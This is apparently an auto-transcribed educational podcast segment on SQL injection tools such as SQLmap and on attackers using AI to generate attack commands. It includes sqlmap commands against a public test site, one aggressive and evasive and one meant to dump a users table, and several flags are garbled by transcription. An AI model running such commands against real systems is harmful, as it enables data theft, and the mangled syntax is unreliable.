Great question. While understanding all those manual techniques we discussed is absolutely fundamental, you need to know how it works. Automation is key for efficiency in the real world. These tools significantly speed up discovery and exploitation. The absolute king, the Swiss Army knife of SQL injection testing, is undoubtedly SQLmap.
SQLmap, okay. I heard that mentioned a few times. What makes it so popular?
It's open source, incredibly powerful, and automates almost everything. It has a sophisticated detection engine that can find injection points. It supports all 6 major injection techniques we covered: Boolean-based blind, time-based blind, error-based, union queries, stack queries, and even out-of-band. Its features are just vast. It can connect directly to the database once credentials are found. It enumerates everything: users, password hashes, privileges, roles, databases, tables, columns. You can try to automatically crack password hashes using dictionary attacks. It dumps table contents. It can read and write files on the server's file system. And it can even get you an operating system shell via out-of-band connections.
Wow, it really does sound like a Swiss Army knife.
It truly is. If you're doing any serious work with SQL, whether attacking or defending, you absolutely need to know SQLmap. Another good one is Mole, also an automatic SQL exploitation tool. It focuses mainly on union and Boolean-based techniques. It has a nice command line interface with auto-completion, supports various databases like MySQL, Postgres, SQL Server, Oracle, can target GUT, PostT, or cookie parameters, and has features to try and bypass IDSPES filters. And there are others too, maybe less common, more specialized. JSQL Injection is a graphical Java-based tool. NoSQLmap specifically targets NoSQL databases like MongoDB. Haviz used to be popular, a commercial tool with the GUI. Blind School Bit Shifting focuses on certain advanced blind techniques, but SQLmap is really the dominant player.
Okay, that covers the main tools. Now, the cutting edge. Yeah. How is artificial intelligence, things like ChatGPT, being used in this space?
AI is rapidly becoming a powerful assistant, both for attackers and, importantly, for defenders, too. It's automating complex task generation, analysis, and making things much faster. Attackers can use AI, like large language models, to generate sophisticated commands for tools like SQLmap. Instead of remembering all the complex flags and syntax, they can just describe what they want to do in plain English.
Like what? Can you give an example?
Sure. An attacker could prompt an AI. Generate an SQLmap command to perform a deep crawl and test all parameters for all types of SQL injection on http.testphp.vulnweb.com running automatically. The AI might then generate a command like sqlmap-u http.testphp.vulnweb.com, batch crawl 5, random agent level 5, risk 3 technique, BE stow.
Okay, let's break that down. Batch means run automatically.
Yep, doesn't ask questions, just uses defaults. Crawl 5 tells it to spider the site up to 5 links deep to find more potential injection points. Random agent uses different browser identifiers for each request to evade simple blocking. Level 5 and Risk 3 tell SQLmap to be extremely thorough and aggressive, trying all possible tests and payloads, even risky ones. And Technique, Usto explicitly tells it to try all 6 techniques: Boolean, error, union, stacked, time-based, and out-of-band.
So the AI crafts this really comprehensive attack command just from a simple description.
Yeah, exactly. And it can get even more specific. An attacker could ask AI to generate the SQLmap command specifically for, say, dumping the users table from the ACHART database using only time-based blind injection. The AI would construct the precise command with the right flags, DT accurate users, dump technique T. It can generate prompts for Boolean-based technique E, error-based technique E, union-based technique to enumerate databases, enumerate tables, enumerate columns, and finally dump the data, like usernames and passwords. The real power for attackers is speed and thoroughness. AI helps them generate highly specific, optimized attack commands quickly, exploring a much wider range of possibilities than a human might manually think of or have time for. It's like having a super efficient research assistant writing perfect attack scripts on demand.
That sounds potent.
It is. But remember, this is an arms race. The same AI capabilities are being used to develop much smarter detection systems, better WAFs, and tools that can analyze code for vulnerabilities more effectively than ever before. AI is becoming crucial on the defensive side, too. The future is definitely AI-driven for both attack and defense. Recap.
Wow, expert speaker. What an absolutely incredible and thorough journey through SQL injection. Seriously, we've covered everything from the basic definition and why it's so damaging to all the different flavors of attack, the step-by-step methodology, the tools, evasion, and even how AI is shaking things up. So for our learner trying to absorb all this, what's the big picture, the main takeaway?
Yeah, it's a lot to take in, but the absolute core takeaway is this. SQL injection fundamentally exploits a breakdown of trust. Specifically, it exploits a failure to properly properly validate and sanitize input that comes from the user. Whether the attacker is getting direct error messages back or inferring data bit by bit through timing delays or using some sneaky out-of-band channel, their goal is always the same. They're trying to trick the database into running their commands the original developer never intended. It boils down to the application blindly trusting data it shouldn't. Understanding that fundamental flaw is the key, whether you're trying to find vulnerabilities as an ethical hacker or trying to build secure applications as a developer.
Right. And the sheer variety of techniques, from that simple comment trick all the way to these complex AI-generated SQL map attacks, it really drives home how cyber threats are constantly evolving, doesn't it? It's a field where you really have to
Keep learning.
outro. And that brings us, I think, to the end of another really deep dive. Thank you so much for guiding us through the sometimes alarming but absolutely critical world of SQL injection with such amazing clarity and detail.
It was my pleasure. It's such a foundational topic in security, and I really hope our listeners feel much more equipped to understand it, whether they're on the offensive or defensive side.
We've seen today how just one tiny mistake, one unvalidated quote mark in handling user input, can potentially unravel an entire system, expose sensitive data, and cause massive damage. So, the learner, here's something to think about. In this world that's getting more connected every second, where basically every input field is a potential attack vector, and where AI can now help both attack and defend with incredible sophistication. How does software development need to change? How do we build applications that are truly trustworthy by design, right from the start? Something to really ponder as you continue your own deep dives into the fascinating world of cybersecurity. Until next time, keep learning, keep questioning, and stay curious.